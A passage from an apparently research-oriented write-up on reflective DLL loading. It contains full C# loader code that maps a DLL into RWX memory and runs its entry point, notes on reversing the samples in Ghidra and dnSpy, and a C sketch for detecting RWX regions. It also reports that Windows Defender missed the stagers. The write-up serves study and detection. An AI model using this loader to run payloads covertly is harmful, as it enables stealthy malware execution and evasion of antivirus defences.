The reflective_loader function differs in that its input is a managed, memory-safe byte[], which is first copied into a new unmanaged memory location.

  static void reflective_loader(byte[] dllBytes)
  {
    void *buffer = Win32.VirtualAlloc(IntPtr.Zero,
                                      (uint)dllBytes.Length,
                                      (uint)(Win32.AllocationTypeFlags.MEM_RESERVE |
                                             Win32.AllocationTypeFlags.MEM_COMMIT),
                                      (uint)Win32.MemoryProtectFlags.PAGE_READWRITE);
    if(buffer == null)
    {
      Console.WriteLine("Error not alloced correctly {0:x}",
                        Win32.GetLastError());
      return;
    }
    fixed(byte *p = dllBytes)
    {
      UIntPtr buffer_sz = new UIntPtr((ulong)dllBytes.Length);
      Win32.memcpy(buffer, p, buffer_sz);
    }

    Win32.IMAGE_DOS_HEADER *dosHeaders = (Win32.IMAGE_DOS_HEADER *)buffer;
    Win32.IMAGE_NT_HEADERS64 *ntHeaders = (Win32.IMAGE_NT_HEADERS64 *)
                                          ((byte *)buffer + dosHeaders->e_lfanew);

    if(ntHeaders->FileHeader.Machine == (ushort)
        Win32.CHIPARCH.IMAGE_FILE_MACHINE_I386)
    {
      Console.WriteLine("Invalid DLL version. Only supports x64");
      return;
    }

Allocate the final unmanaged memory region that will hold the mapped DLL, with Read, Write, and Execute permissions.

    uint dllImageSize = ntHeaders->OptionalHeader.SizeOfImage;

    // allocate new memory space for the DLL at the image's preferred base address; VirtualAlloc returns null if that range is unavailable
    void *dllBase = Win32.VirtualAlloc((IntPtr)
                                       ntHeaders->OptionalHeader.ImageBase,
                                       dllImageSize,
                                       (uint)(Win32.AllocationTypeFlags.MEM_RESERVE |
                                              Win32.AllocationTypeFlags.MEM_COMMIT),
                                       (uint)Win32.MemoryProtectFlags.PAGE_EXECUTE_READWRITE);
    if(dllBase == null)
    {
      Console.WriteLine("Error not alloced correctly {0:x}",
                        Win32.GetLastError());
      return;
    }
    Console.WriteLine("Memory location 0x{0:X}",
                      (ulong)((byte *)dllBase));

    // get delta between this module's image base and the DLL that was read into memory
    // (use the value of dllBase, not the address of the local variable)
    ulong deltaImageBase = (ulong)dllBase -
                           ntHeaders->OptionalHeader.ImageBase;

    // copy over DLL image headers to the newly allocated space for the DLL
    Win32.memcpy(dllBase, buffer,
                 new UIntPtr(ntHeaders->OptionalHeader.SizeOfHeaders));

Copy each section into the new memory buffer with the corrected offsets.

    // copy over DLL image sections to the newly allocated space for the DLL
    Win32.IMAGE_SECTION_HEADER *section = IMAGE_FIRST_SECTION(ntHeaders);
    for(uint i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++)
    {
      void *sectionDestination = (void *)((byte *)dllBase +
                                          section->VirtualAddress);
      void *sectionBytes = (void *)((byte *)buffer +
                                    section->PointerToRawData);
      Win32.memcpy(sectionDestination, sectionBytes,
                   new UIntPtr(section->SizeOfRawData));
      section++;
    }

Update all the Relocations with the new memory address.

    // perform image base relocations
    Win32.IMAGE_DATA_DIRECTORY relocations =
        ntHeaders->OptionalHeader.BaseRelocationTable;
    void *relocationTable = relocations.VirtualAddress +
                            (byte *)dllBase;
    uint relocationsProcessed = 0;

    // TODO: test this while loop. The current sample doesn't have a relocation table
    while(relocationsProcessed < relocations.Size)
    {
      Win32.BASE_RELOCATION_BLOCK *relocationBlock =
          (Win32.BASE_RELOCATION_BLOCK *)
          ((byte *)relocationTable + relocationsProcessed);
      relocationsProcessed += (uint)sizeof(Win32.BASE_RELOCATION_BLOCK);
      uint relocationsCount = (uint)((relocationBlock->BlockSize -
                                      sizeof(Win32.BASE_RELOCATION_BLOCK)) /
                                     sizeof(Win32.BASE_RELOCATION_ENTRY));
      Win32.BASE_RELOCATION_ENTRY *relocationEntries =
          (Win32.BASE_RELOCATION_ENTRY *)
          ((byte *)relocationTable + relocationsProcessed);

      for(uint i = 0; i < relocationsCount; i++)
      {
        relocationsProcessed += (uint)sizeof(Win32.BASE_RELOCATION_ENTRY);

        if(relocationEntries[i].Type == 0)
        {
          continue;
        }

        uint relocationRVA = relocationBlock->PageAddress +
                             relocationEntries[i].Offset;
        // 64-bit value: sizeof(void *) bytes are read into and written from it
        ulong addressToPatch = 0;
        IntPtr tmp = new IntPtr(0);
        Win32.ReadProcessMemory(Win32.GetCurrentProcess(),
                                new IntPtr((byte *)dllBase + relocationRVA),
                                new IntPtr(&addressToPatch),
                                sizeof(void *), out tmp);
        addressToPatch += deltaImageBase;
        Win32.memcpy(((byte *)dllBase + relocationRVA), &addressToPatch,
                     new UIntPtr((ulong)sizeof(void *)));
      }
    }

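Load any dependencies using LoadLibrary and update the function pointers. Unlike the C version, this port only resolves imports by name and does not handle imports by ordinal.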

    // resolve import address table
    Win32.IMAGE_IMPORT_DESCRIPTOR *importDescriptor = null;
    Win32.IMAGE_DATA_DIRECTORY *importsDirectory =
        (Win32.IMAGE_DATA_DIRECTORY *)
        &ntHeaders->OptionalHeader.ImportTable;
    importDescriptor = (Win32.IMAGE_IMPORT_DESCRIPTOR *)(
                           importsDirectory->VirtualAddress + (byte *)dllBase);
    byte *libraryName = null;
    IntPtr library = IntPtr.Zero;
    while(importDescriptor->Name != 0)
    {
      libraryName = importDescriptor->Name + (byte *)dllBase;
      library = (IntPtr)Win32.LoadLibrary((char *)libraryName);

      if(library != IntPtr.Zero)
      {
        Win32.IMAGE_THUNK_DATA *thunk = null;
        thunk = (Win32.IMAGE_THUNK_DATA *)((byte *)dllBase +
                                           importDescriptor->FirstThunk);

        while(thunk->AddressOfData != 0)
        {
          Win32.IMAGE_IMPORT_BY_NAME *functionName =
              (Win32.IMAGE_IMPORT_BY_NAME *)
              ((byte *)dllBase + thunk->AddressOfData);
          void *functionAddress = (void *)Win32.GetProcAddress(library,
                                  functionName->Name);
          thunk->Function = (UInt64)functionAddress;
          ++thunk;
        }
      }

      importDescriptor++;
    }

Create a function delegate to act as the function pointer from C. Calculate the offset to the entry point and call the DLLMain.

    int DLL_PROCESS_ATTACH = 1;
    // execute the loaded DLL
    tmpFuncDelegate foo = (tmpFuncDelegate)
                          Marshal.GetDelegateForFunctionPointer(
                              new IntPtr((byte *)dllBase +
                                         ntHeaders->OptionalHeader.AddressOfEntryPoint),
                              typeof(tmpFuncDelegate));

    Console.WriteLine("Sleeping to capture memory image");
    Thread.Sleep(40000);
    Console.WriteLine("Finished Sleeping ");

    foo((byte *)dllBase, DLL_PROCESS_ATTACH, null);

    Console.WriteLine("Press 'q' to exit");
    while(Console.ReadKey().Key != ConsoleKey.Q) {}

    Win32.VirtualFree(dllBase, (uint)dllImageSize,
                      (uint)Win32.AllocationTypeFlags.MEM_RELEASE);
    Win32.VirtualFree(buffer, (uint)dllBytes.Length,
                      (uint)Win32.AllocationTypeFlags.MEM_RELEASE);
  }

1.4      Reversing the Code

The C code we discussed earlier was compiled into a Windows 64-bit executable using MinGW, then disassembled and decompiled with Ghidra.

The figures below show the Ghidra decompilation of the first sample. As you can see, Ghidra does a pretty good job, and the generated source code is a very close match to the original. Again, we didn't implement any type of anti-forensics or obfuscation.

Figure 15 - Decompilation of C Main function
Figure 16 - Decompilation of the reflective_loader Function

Reversing most C# code is simple with dnSpy. There are methods to hide or corrupt the .exe so that dnSpy cannot decompile it, but for the most part, attackers do not go to that extent.

To load the executable in dnSpy, simply drag and drop it onto the left pane. Once loaded, the pane will provide a tree listing of the components of the .exe.

The following image is the reflective_loader example as shown in dnSpy. Again, it’s very close to the original.

Figure 17 - DnSpy Generated Source Code for Main Function
Figure 18 - DnSpy Generated Source Code for the reflective_loader Function
Figure 19 - DnSpy Generated Source Code for the reflective_loader Function

1.5      Conclusion

Reflective Loaders are a great tool for attackers and a pain for defenders. One way defenders can detect or prevent them is to identify new memory allocations that are created with RWX permissions, since most allocated memory does not need the execute permission. Another is to monitor and capture network traffic; however, this often isn't practical, as it would involve implementing SSL stripping and storing large amounts of data.
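As a rough illustration of the RWX heuristic, the sketch below flags regions that are both writable and executable and are not backed by a file on disk. It is only the decision logic: region_info is a hypothetical subset of the fields a tool would obtain from VirtualQueryEx (MEMORY_BASIC_INFORMATION), and the constants repeat the winnt.h values so that the example stands alone.

```c
#include <assert.h>
#include <stdint.h>

#define PG_EXECUTE_READWRITE 0x40u      /* PAGE_EXECUTE_READWRITE */
#define PG_EXECUTE_WRITECOPY 0x80u      /* PAGE_EXECUTE_WRITECOPY */
#define REGION_MEM_PRIVATE   0x20000u   /* MEM_PRIVATE */
#define REGION_MEM_IMAGE     0x1000000u /* MEM_IMAGE */

/* Hypothetical subset of MEMORY_BASIC_INFORMATION used by the check. */
typedef struct {
    uint32_t protect; /* page protection flags of the region */
    uint32_t type;    /* MEM_PRIVATE, MEM_IMAGE, ... */
} region_info;

/* Flag private memory that is writable and executable at the same time. */
int is_suspicious_region(const region_info *r) {
    /* drop modifier bits such as PAGE_GUARD before comparing */
    uint32_t base_protect = r->protect & 0xFFu;
    int writable_and_executable = base_protect == PG_EXECUTE_READWRITE ||
                                  base_protect == PG_EXECUTE_WRITECOPY;
    return writable_and_executable && r->type == REGION_MEM_PRIVATE;
}
```

A hit is a lead rather than a verdict, since some legitimate software, such as just-in-time compilers, may also allocate writable and executable memory. A loader that sets per-section permissions would not be caught by this check at all.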

During the testing of these samples, Windows Defender did not flag any of the stagers but did flag the DLL's execution in memory. The DLL was flagged because it was a generic Metasploit-generated payload.